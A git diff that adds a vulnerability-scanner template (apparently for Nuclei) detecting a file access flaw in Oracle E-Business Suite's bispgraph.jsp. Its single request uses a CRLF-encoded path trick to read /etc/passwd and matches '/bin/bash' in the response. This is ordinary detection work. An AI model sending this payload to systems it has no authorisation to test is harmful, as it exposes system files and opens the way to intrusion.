diff --git a/vulnerabilities/oracle-ebs-bispgraph-file-access-vulnerability(rce).yaml b/vulnerabilities/oracle-ebs-bispgraph-file-access-vulnerability(rce).yaml new file mode 100644 index 0000000000..f9d8da60fc --- /dev/null +++ b/vulnerabilities/oracle-ebs-bispgraph-file-access-vulnerability(rce).yaml @@ -0,0 +1,18 @@ +id: Oracle EBS bispgrapgh File Access Vulnerability + +# Source: David Lithcfield + +info: + name: bispgrapgh File Access Vulnerability + author: Alfie Njeru (@emenalf) - https://the-infosec.com + severity: High + +requests: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" + + matchers: + - type: word + words: + - "/bin/bash"